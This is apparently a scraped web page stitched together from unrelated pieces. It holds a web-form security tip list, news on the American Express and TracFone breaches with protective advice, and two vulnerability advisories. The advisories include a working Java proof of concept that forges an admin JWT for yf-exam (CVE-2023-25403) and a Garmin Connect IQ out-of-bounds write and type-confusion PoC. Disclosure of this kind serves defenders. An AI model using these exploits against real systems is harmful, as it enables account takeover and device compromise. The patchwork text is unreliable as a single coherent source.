*   **Information Encryption**

The short answer is that it creates encrypted content that takes a lot of effort, time, and money to decrypt. As mentioned earlier, it may not help secure the information as it is typed in, but it helps keep it safe as it travels on the Internet.

*   **Password Protected Forms**

Doing this and having people sign up for accounts gives you more information on the users. It means you have more tools at your disposal to help you weed out the hackers and such. Sadly, fewer website visitors are willing to sign up for accounts, especially if they are not invested in what you are offering or selling.

*   **Have Somebody Check the Code**

If you are not a programmer yourself, then have somebody else check the code. You are looking for nice clean code with **no hidden elements**. A clever way of hiding code is to slot it in between copied and pasted content.

If there is a lot of extraneous code in the web form, then this suggests that either the original developer did a poor job, or it suggests there are holes in the program that others (including the original developer) can exploit.

Do have somebody check for hidden fields and such but remember that some hidden fields are used for security themselves, so find a programmer who understands the nuances of form security.

If you are unsure, then have another person check the code, there are plenty of qualified developers on freelance websites who can do **security checkups** for your web forms. Just be careful not to give them full access to your website or you may never see it again.

If you are looking for more control over your forms so that you can determine (firsthand) if your forms are secure, then look into the Headless Forms system. You can get **more info here** if you are interested.

1.  **Best Data Science Tools in 2020**
2.  **Is CSS Really Necessary for Responsive Web Design?**
3.  **What Programming Languages Do Ethical Hackers Use?**
4.  **Machine Learning: How To Become A Machine Learning Engineer?**
5.  **How to Develop Complex Marketing Operations with “No Code” Tools**

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

Do You Know If Your Web Forms Are Secure?

American Express has warned affected customers about a breach at a merchant process that leaked account numbers, names, and card expiration dates.

American Express has sent affected customers a warning that “a third party service provider engaged by numerous merchants experienced unauthorized access to its system.”

In a subsequent update, American Express explained that it was not a service provider, but a merchant processor that suffered the breach.

The account information of some card holders may have fallen into the wrong hands. The accessed information includes account numbers, names, and card expiration dates.

Further details about which merchant processor was involved and how, are not available at the time of writing.

American Express said it notified the required regulatory authorities and is alerting impacted customers. The company also told BleepingComputer that if a card member’s credit card is used to make fraudulent purchases, customers won’t be responsible for the charges.

American Express is advising customers to carefully review their account for fraudulent activity. Below are some steps you can take to protect your account.

*   Login to your account at americanexpress.com/MYCA to review your account statements carefully and remain vigilant in doing so, especially over the next 12 to 24 months.
*   If your card is active, sign up to receive instant notifications of potential suspicious activity by enabling Notifications in the American Express Mobile app, or signing up for email or text messaging at americanexpress.com/accountalerts.
*   Make sure American Express has your correct mobile phone number and email address so the company can contact you if needed.
*   If you receive an email relating to American Express that you believe could be fraudulent, immediately forward it to UKemailfraud@americanexpress.com. Do not include your account number in the email.

**Beware of scammers**

Scammers are always on the lookout for data breaches as it presents an opportunity for phishing. There are a few tips to keep in mind.

*   American Express will never ask for sensitive account details by email or phone.
*   Do not install software when asked out of the blue, especially if it reaches you as an email attachment.
*   Scammers will always invoke a feeling of urgency. Don’t let scammers rush you into making wrong decisions.
*   Keep your anti-malware software and security patches up-to-date to prevent fraudsters accessing your details via your computer.
*   If you’re an Android user, be wary of screen overlays on your devices that could capture entered information while you think you are in the actual app. Screen overlays are hard to recognize but on Android you can check **Settings** > **Apps & notifications** \> **Special access** > **Draw over other apps**. (Note that the path may be slightly different depending on your Android version and the phone vendor.) Once there you can review all apps that have the option to “draw over” other apps and see whether or not they have the permission to do so.

**Data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

**Digital Footprint scan**

If you want to find out how much of your own data is currently exposed online, you can try our free Digital Footprint scan. Fill in your email address (it’s best to submit the one you most frequently use) and we’ll send you a report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using Malwarebytes Identity Theft Protection.

 American Express warns customers about third party data breach 

Prepay wireless provider TracFone has been slapped on the wrist to the tune of $16 million for insufficient customer data protection

Following three separate data breaches between 2021 and 2023 which exposed the proprietary information (PI) of TracFone Wireless customers, the Federal Communications Commission (FCC) announced that the Verizon-owned company has agreed to pay a $16 million civil penalty to settle the government investigation, and it has made an agreement to improve its application programming interface  (API) security.

TracFone Wireless Inc. is an American prepay wireless service provider wholly owned by Verizon. TracFone services are used by the brands Straight Talk, Total by Verizon Wireless, and Walmart Family Mobile.

The settlement ends an investigation into TracFone’s security practices to uncover whether the breaches were the result of ineffective cybersecurity protocols. The Enforcement Bureau (EB) of the FCC found that cybercriminals gained access to certain TracFone customer information, including PI and customer proprietary network information (CPNI), by exploiting vulnerabilities related to customer-facing APIs.

APIs allow different computer programs or components to communicate with one another. When the security behind the APIs is not secure enough, cybercriminals can abuse them to gather information without authorization.

The FCC media release explains in detail that it is possible to leverage numerous APIs to access customer information from websites. And according to the FCC’s own Enforcement Bureau, that is exactly what happened at TracFone.

In addition to the civil penalty, the FCC secured extra assignments for TracFone in the Consent Decree:

*   TracFone has to deploy a mandated information security program, with novel provisions to reduce API vulnerabilities in ways consistent with widely accepted standards, like those identified by the National Institute of Standards and Technology (NIST) and the Open Worldwide Application Security Project (OWASP).
*   TracFone must improve protection measures against SIM-swapping. SIM swapping (and the very similar port-out fraud) is the unlawful use of someone’s personal information to steal their phone number and swap or transfer it to another device. With this, criminals can intercept calls, messages, and certain multi-factor authentication (MFA) codes.
*   TracFone has to undergo annual assessments—including by independent third parties—of its information security program.
*   Employees and certain third parties are to receive privacy and security awareness training.

The Enforcement Bureau reported to the FCC that:

> “After gaining access to customer information during one of the three breaches, the threat actors completed an undisclosed number of unauthorized port-outs.”

 All this occurs as the FCC has continued a mission against SIM-swapping.

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

****Check your exposure****

You can verify whether your information is available online due to data breaches by using the Malwarebytes Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan, and we’ll give you a report. For those whose information was not included, you’ll still likely find other exposures in previous data breaches.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 TracFone will pay $16 million to settle FCC data breach investigation 

CleverStupidDog yf-exam v 1.8.0 is vulnerable to Authentication Bypass. The program uses a fixed JWT key, and the stored key uses username format characters. Any user who logged in within 24 hours. A token can be forged with his username to bypass authentication.

**Description**

_**yf-exam**_ is a multi-role online training and examination system. The system integrates functions such as user management, role management, department management, question bank management, test question management, test question import and export, test management, online test, and wrong question training. The process is perfect. The program uses a fixed JWT key, and the stored key uses username format characters. Any user who logged in within 24 hours. A token can be forged with his username to bypass authentication.

**Vulnerability details**

login

    com.yf.exam.modules.sys.user.controller#login()
    

Follow up the interface

    com.yf.exam.modules.sys.user.service#lgion()
    

View the implementation class of the interface

    com.yf.exam.modules.sys.user.service.impl#login()
    

First check whether the account exists, then check whether it is disabled, then check whether it is a password, and generate a token after passing.

    com.yf.exam.modules.sys.user.service.impl#setToken()
    

You can see that it is generated using jwt. Then fill token, id.

    com.yf.exam.ability.shiro.jwt#sign()
    

  
Here you can see that the payload is username, data, and the token is valid for 24 hours. jwt-key is encrypted username, follow up.

    com.yf.exam.ability.shiro.jwt#encryptSecret()
    

Here you can see that the jwt-key is to take the md5 value twice. The jwt-key is generated based on the user name and remains unchanged for the current month, so it is very easy to forge.

**TEST**

Simulate admin login at around 13:44

  
Use poc to generate jwt

Import jwt and try to log in

After the import is refreshed, it successfully enters the background.

poc

import java.io.FileNotFoundException;
import java.security.MessageDigest;
import java.util.Calendar;
import java.util.Date;
import java.io.FileOutputStream;
import java.io.PrintStream;

import com.auth0.jwt.JWT;
import com.auth0.jwt.algorithms.Algorithm;
import com.auth0.jwt.interfaces.DecodedJWT;
import com.auth0.jwt.interfaces.JWTVerifier;
public class Jwt\_Test {
    private static final long EXPIRE\_TIME = 24 \* 60 \* 60 \* 1000;
    public static String MD5(String str) {

        try {
            MessageDigest md = MessageDigest.getInstance("MD5");
            byte\[\] array = md.digest(str.getBytes("UTF-8"));
            StringBuilder sb = new StringBuilder();
            for (byte item : array) {
                sb.append(Integer.toHexString((item & 0xFF) | 0x100).substring(1, 3));
            }
            return sb.toString();
        } catch (Exception e) {
            return null;
        }
    }

    private static String encryptSecret(String userName) {

        // 一个简单的登录规则，用户名+当前月份为加密串，意思每个月会变，要重新登录
        // 可自行修改此规则
        Calendar cl = Calendar.getInstance();
        cl.setTimeInMillis(System.currentTimeMillis());
        StringBuffer sb = new StringBuffer(userName)
                .append("&")
                .append(cl.get(Calendar.MONTH));

        // 获取MD5
        String secret = MD5(sb.toString());
//        System.out.println("jwt\_key：" + secret);

        return MD5(userName + "&" + secret);
    }

    public static String sign(String username, long time) {
        Date date = new Date(time+EXPIRE\_TIME);
        System.out.println("token有效期:" + date);
        Algorithm algorithm = Algorithm.HMAC256(encryptSecret(username));
        // 附带username信息
        System.out.println("jwt-key :"+encryptSecret(username));
        return JWT.create()
                .withClaim("username", username)
                .withExpiresAt(date).sign(algorithm);

    }

    public static void main(String\[\] args) throws FileNotFoundException {
//        for (long i = 1675576527000L; i < 1675576827000L; i+=1000) {
//            String token = sign("admin", i);  //每秒计算一次jwt
//            System.out.println(token);
//            }
        String token = sign("admin", 1675577612169L);
        System.out.println(token);
        }
}

CVE-2023-25403: Authentication Bypass vulnerability · Issue #2 · CleverStupidDog/yf-exam

The `Toybox.Ant.BurstPayload.add` API method in CIQ API version 2.2.0 through 4.1.7 suffers from a type confusion vulnreability, which can result in an out-of-bounds write operation. A malicious application could create a specially crafted `Toybox.Ant.BurstPayload` object, call its `add` method, override arbitrary memory and hijack the execution of the device's firmware.

**Relative Out-of-bound Write and Type Confusion in Toybox.Ant.BurstPayload**

The BurstPayload object supports the add method to add a message to its internal queue. Before adding a message, it checks that its size attribute is within a limit. If it is above the limit, it raises an Out of Memory exception.

However, the add method fails to check if the size is negative. It is possible to create a class inheriting from BurtPayload with a negative size attribute. When adding messages, it will write outside of the intended location the 8 bytes of the message to add.

Even if the method checks if the size is negative, it can still be abused to write outside of the intended buffer. Indeed, the size and burstDataBlob attributes are not correlated. By inheriting from BurstPayload, it is possible to override burstDataBlob with an object whose size is smaller than the size attribute, leading to out-of-bound write.

Furthermore, overriding the burstDataBlob attribute with another object results in a type confusion. The add method will attempt to write at offset 0x0c and 0x10 of the object, regardless of its type. By specifying an array, it is possible to override its first two objects in memory.

This can be leveraged to corrupt the memory of the device, and most likely be abused to hijack the execution of the firmware.

e\_tvm\_error native:Toybox.Ant.BurstPayload.add(s\_tvm\_ctx \*ctx,uint nb\_args)
{
// \[...\]
  // Anvil: Get the \`size\` field as a 4-byte integer
  eVar1 = tvm\_get\_field\_size\_as\_int(ctx,object,&field\_size);
  uVar2 = (uint)eVar1;
  if (uVar2 == 0) {
    // Anvil: Check that we're not exceeding 0x2000 messages but does not check that it is positive
    if (0x1fff < (int)field\_size) {
      return OUT\_OF\_MEMORY\_ERROR;
    }
    // Anvil: Get the 8 bytes of data to add to the message
    eVar1 = tvm\_message\_copy\_payload\_data(ctx,ctx->frame\_ptr + 10,payload\_data);
// \[...\]
      // Anvil: Retrieve \`burstDataBlob\` attribute
      eVar1 = tvm\_object\_get\_field\_value-?(ctx,object,field\_burstDataBlob,&burst\_data\_blob,1);
      if ((uVar2 == 0) && (uVar2 = \_tvm\_object\_get\_object\_data(ctx,burst\_data\_blob.value,(undefined \*)&blob\_data), uVar2 == 0)) {
        // Anvil: Write the 8 bytes of data to the blob data, at \`size\` offset.
        \*(undefined4 \*)(blob\_data + field\_size + 0xc) = payload\_data.\_0\_4\_;
        \*(undefined4 \*)(blob\_data + field\_size + 0x10) = payload\_data.\_4\_4\_;
// \[...\]

The following proof-of-concept will attempt to write 0x44 8 times at the relative location + 0xdeadbeef:

class MyBurstPayload extends Ant.BurstPayload {
    function initialize() {
        Ant.BurstPayload.initialize();
        self.size = 0xdeadbeef;
    }
}
// \[...\]

var burst = new MyBurstPayload();

var data = new\[8\];
for (var j = 0; j < 8; j++) {
	data\[j\] = 0x44;
}

burst.add(data);

The proof-of-concept applications can be found here:

*   Relative out-of-bound write https://github.com/anvilsecure/garmin-ciq-app-research/blob/main/poc/GRMN-09.prg
*   Type confusion https://github.com/anvilsecure/garmin-ciq-app-research/blob/main/poc/GRMN-11.prg

Search

lenovo warranty check/lookup | check warranty status | lenovo support us